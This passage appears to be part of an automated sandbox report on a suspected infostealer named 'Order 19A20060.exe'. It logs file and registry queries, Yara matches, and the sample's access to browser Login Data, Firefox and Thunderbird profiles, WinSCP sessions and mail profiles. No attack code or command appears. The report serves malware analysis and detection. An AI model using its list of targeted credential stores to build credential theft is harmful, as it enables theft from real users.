                        Source: C:\Users\user\Desktop\Order 19A20060.exe | Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\Order 19A20060.exe | Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\Order 19A20060.exe | Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
                        Source: C:\Users\user\Desktop\Order 19A20060.exe | Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
                        Source: C:\Users\user\Desktop\Order 19A20060.exe | Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
                        Source: C:\Users\user\Desktop\Order 19A20060.exe | Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
                        Source: C:\Users\user\Desktop\Order 19A20060.exe | Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\Order 19A20060.exe | Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
                        Source: C:\Users\user\Desktop\Order 19A20060.exe | Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\Order 19A20060.exe | Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\Order 19A20060.exe | Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\Order 19A20060.exe | Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\Order 19A20060.exe | Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\Order 19A20060.exe | Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\Order 19A20060.exe | Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\Order 19A20060.exe | Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\Order 19A20060.exe | Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\Order 19A20060.exe | Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\Order 19A20060.exe | Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\Order 19A20060.exe | Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\Order 19A20060.exe | Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\Order 19A20060.exe | Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\Order 19A20060.exe | Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\Order 19A20060.exe | Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
                        Source: C:\Users\user\Desktop\Order 19A20060.exe | Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\Order 19A20060.exe | Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
                        Source: C:\Users\user\Desktop\Order 19A20060.exe | Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
                        Source: C:\Users\user\Desktop\Order 19A20060.exe | Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
                        Source: C:\Users\user\Desktop\Order 19A20060.exe | Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
                        Source: C:\Users\user\Desktop\Order 19A20060.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                        Source: C:\Users\user\Desktop\Order 19A20060.exe | Queries volume information: C:\Users\user\Desktop\Order 19A20060.exe VolumeInformation
                        Source: C:\Users\user\Desktop\Order 19A20060.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                        Source: C:\Users\user\Desktop\Order 19A20060.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                        Source: C:\Users\user\Desktop\Order 19A20060.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                        Source: C:\Users\user\Desktop\Order 19A20060.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                        Source: C:\Users\user\Desktop\Order 19A20060.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe | Queries volume information: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe VolumeInformation
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                        Source: C:\Users\user\Desktop\Order 19A20060.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                        Stealing of Sensitive Information

Source: Yara match | File source: dump.pcap, type: PCAP
Source: Yara match | File source: 0.2.Order 19A20060.exe.44d8f00.11.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Order 19A20060.exe.4513b20.8.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Order 19A20060.exe.4513b20.8.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Order 19A20060.exe.44d8f00.11.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000000F.00000002.4097929274.0000000002BB1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000F.00000002.4097929274.0000000002BD7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.4097970191.0000000002EC1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.4097970191.0000000002EE7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1679354233.0000000004DD1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1679354233.0000000004443000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: Order 19A20060.exe PID: 7420, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: Order 19A20060.exe PID: 7872, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: SgJzugoOJvLgL.exe PID: 1236, type: MEMORYSTR
Source: Yara match | File source: 0.2.Order 19A20060.exe.3190e28.7.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.2.SgJzugoOJvLgL.exe.289658c.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.2.SgJzugoOJvLgL.exe.2590e50.5.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Order 19A20060.exe.349648c.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Order 19A20060.exe.347842c.4.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Order 19A20060.exe.31a0e40.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Order 19A20060.exe.7a40000.14.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.2.SgJzugoOJvLgL.exe.25a0e5c.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Order 19A20060.exe.31a0e40.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Order 19A20060.exe.4169970.10.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.2.SgJzugoOJvLgL.exe.2590e50.5.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Order 19A20060.exe.3477414.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.2.SgJzugoOJvLgL.exe.289658c.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Order 19A20060.exe.3190e28.7.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Order 19A20060.exe.77b0000.12.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Order 19A20060.exe.349648c.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Order 19A20060.exe.77b0000.12.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.2.SgJzugoOJvLgL.exe.28587d0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Order 19A20060.exe.7a40000.14.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Order 19A20060.exe.4169970.10.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.2.SgJzugoOJvLgL.exe.25a0e5c.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.2.SgJzugoOJvLgL.exe.28497a0.4.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Order 19A20060.exe.34586d0.5.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.2.SgJzugoOJvLgL.exe.284e7b8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000002.1682578950.00000000077B0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.1714009771.000000000281D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1682974196.0000000007A40000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.1714009771.0000000002896000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1678263931.00000000031A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.1714009771.00000000025A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1678263931.0000000003458000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1679354233.0000000004169000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.1714009771.0000000002561000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1678263931.0000000003161000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1678263931.0000000003496000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: C:\Users\user\Desktop\Order 19A20060.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: C:\Users\user\Desktop\Order 19A20060.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\user\Desktop\Order 19A20060.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
Source: C:\Users\user\Desktop\Order 19A20060.exe | Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe | Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
Source: Yara match | File source: 0.2.Order 19A20060.exe.44d8f00.11.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Order 19A20060.exe.4513b20.8.unpack, type: UNPACKEDPE
Source: Yara match | File source: 8.2.Order 19A20060.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Order 19A20060.exe.4513b20.8.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Order 19A20060.exe.44d8f00.11.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000000F.00000002.4097929274.0000000002BB1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.4097970191.0000000002EC1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1679354233.0000000004DD1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1679354233.0000000004443000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: Order 19A20060.exe PID: 7420, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: Order 19A20060.exe PID: 7872, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: SgJzugoOJvLgL.exe PID: 1236, type: MEMORYSTR

                        Remote Access Functionality

Source: Yara match | File source: dump.pcap, type: PCAP
Source: Yara match | File source: 0.2.Order 19A20060.exe.44d8f00.11.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Order 19A20060.exe.4513b20.8.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Order 19A20060.exe.4513b20.8.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Order 19A20060.exe.44d8f00.11.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000000F.00000002.4097929274.0000000002BB1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000F.00000002.4097929274.0000000002BD7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.4097970191.0000000002EC1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.4097970191.0000000002EE7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1679354233.0000000004DD1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1679354233.0000000004443000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: Order 19A20060.exe PID: 7420, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: Order 19A20060.exe PID: 7872, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: SgJzugoOJvLgL.exe PID: 1236, type: MEMORYSTR
Source: Yara match | File source: 0.2.Order 19A20060.exe.3190e28.7.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.2.SgJzugoOJvLgL.exe.289658c.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.2.SgJzugoOJvLgL.exe.2590e50.5.unpack, type: UNPACKEDPE
